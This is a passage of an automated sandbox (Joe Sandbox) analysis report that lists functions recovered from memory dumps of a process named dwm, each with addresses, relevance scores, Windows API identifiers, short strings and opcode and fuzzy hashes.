                        • Instruction ID: 5db4bf35490c9535bfb789867f251264d725460648658cf3397f4fdb5e86765b
                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                        • Instruction Fuzzy Hash: 5ED10372B15A8889E711CFB9D84839C3BB1F35479CF11421ACE5EA7B9DDA36C406C390
                        Function 0000026DB16714A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Heap$Process$Free
                        • String ID:
                        • API String ID: 3168794593-0
                        • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                        • Instruction ID: 616520f4e758efb2071ff87cfe3e843c1d7a651e35575c538645b5f7045acf14
                        • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                        • Instruction Fuzzy Hash: 3D015E32A01B98C6D704DF6AED0814A77A0F798F8AF054426EF894372EDE39C051C780
                        Function 0000026DB1682980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: ConsoleErrorLastMode
                        • String ID:
                        • API String ID: 953036326-0
                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                        • Instruction ID: 9cfadaf4278a1a042e4a221af9e5ea8801c7b6c357dc5ef3b2758d2e7e777b58
                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                        • Instruction Fuzzy Hash: 1E91B372F1165889F7609F659C883AD3BA0F754B8CF16410FDE0A6769DDB36C486C780
                        Function 0000026DB1677960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                        • String ID:
                        • API String ID: 2933794660-0
                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                        • Instruction ID: 47968e999b61308f49ce7e01167395efad535526a62dfb10e2b566ede07d25a3
                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                        • Instruction Fuzzy Hash: FB113032B10F058AEB00CF64EC593A833A4F71976CF450E21EA6D467A9DF79C1A8C380
                        Function 0000026DB167253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: FileType
                        • String ID: \\.\pipe\
                        • API String ID: 3081899298-91387939
                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                        • Instruction ID: 78f7fafe200708843e340e4dc25fecd37768daa2e3b960b486fcb56aa6fba473
                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                        • Instruction Fuzzy Hash: CB71F336B0078986E725DF259D483BAA7A4F389B8CF56022ADD0943B8DDF36C645C780
                        Function 0000026DB15B9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746673900.0000026DB15B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db15b0000_dwm.jbxd
                        Similarity
                        • API ID: CallTranslator
                        • String ID: MOC$RCC
                        • API String ID: 3163161869-2084237596
                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction ID: 96189fdb050394e3dddf355c179918c5da2f206e1441c6d51b5262eb5e2b80f4
                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                        • Instruction Fuzzy Hash: 80614372A00B888AEB20DF65D8843AE77B0F788B9CF154215EE4917B9CDB3AD195C744
                        Function 0000026DB1672330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: FileType
                        • String ID: \\.\pipe\
                        • API String ID: 3081899298-91387939
                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                        • Instruction ID: 6757882edd15c92c02be4a4c64f007955a3ff6155e70e70bb19f3b41c0914e66
                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                        • Instruction Fuzzy Hash: 4351C432B0478981F674DF29E89C3AA6765F385788F46022DDE5A03B9DDA3BC945C7C0
                        Function 0000026DB16826F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: ErrorFileLastWrite
                        • String ID: U
                        • API String ID: 442123175-4171548499
                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                        • Instruction ID: afbf1178cc8222802efba89ca99b38783906569562458b943e92f1470ffb59b4
                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                        • Instruction Fuzzy Hash: 5641F772B25B8482DB20DF25EC483A977A0F398798F524026EE4D87798EF3DC445C780
                        Function 0000026DB16794A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: ExceptionFileHeaderRaise
                        • String ID: csm
                        • API String ID: 2573137834-1018135373
                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                        • Instruction ID: 3243659a9b159d7e16ea027822bec1d8889ca364bcfbab3cf3fea8797474cb1a
                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                        • Instruction Fuzzy Hash: 77112832615B8482EB618B29E848359B7E5FB88B98F594221EF8C07B6CDF3DC551CB40
                        Function 0000026DB15B7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746673900.0000026DB15B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db15b0000_dwm.jbxd
                        Similarity
                        • API ID: __std_exception_copy
                        • String ID: ierarchy Descriptor'$riptor at (
                        • API String ID: 592178966-758928094
                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                        • Instruction ID: 6bbfd39685d2830decafeb26a3673bdb7252fceed1b09d9fc54d843661b06706
                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                        • Instruction Fuzzy Hash: FEE08671B50B4890DF018F61EC442E833F4DB59B68B999122995C06315FB38D1F9C300
                        Function 0000026DB15B73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746673900.0000026DB15B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15B0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db15b0000_dwm.jbxd
                        Similarity
                        • API ID: __std_exception_copy
                        • String ID: Locator'$riptor at (
                        • API String ID: 592178966-4215709766
                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                        • Instruction ID: e73fd31c6e150cf26d920c1bc37515f6ba5b386a7fe5e69b554b71fd141b517e
                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                        • Instruction Fuzzy Hash: C2E08C71B10B4880DF028F61EC802E873B4EB6AB68F899122CA4C06319EB38D1E9C300
                        Function 0000026DB1671BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Heap$Process$AllocFree
                        • String ID:
                        • API String ID: 756756679-0
                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                        • Instruction ID: 9901ef0c53ba639cf9c2774f52fea5f4f606d4c37f084e5de7fdaf40b5b30672
                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                        • Instruction Fuzzy Hash: B2118235B01B48C1EB44DF6AA80822973A1F789FC9F194126DE4D5776ADE39C442C380
                        Function 0000026DB1671268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000004B.00000002.2746707137.0000026DB1670000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1670000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_75_2_26db1670000_dwm.jbxd
                        Similarity
                        • API ID: Heap$AllocProcess
                        • String ID:
                        • API String ID: 1617791916-0
                        • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                        • Instruction ID: 98bdc3652fe0f84a4e47298f21fa934a7790b4a66fd0bcd7e14f59bb28401e06
                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                        • Instruction Fuzzy Hash: D6E06D35B0160886EB048F66DC0C34A36E1FB99F0AF06C024CA890B356EF7E8499C790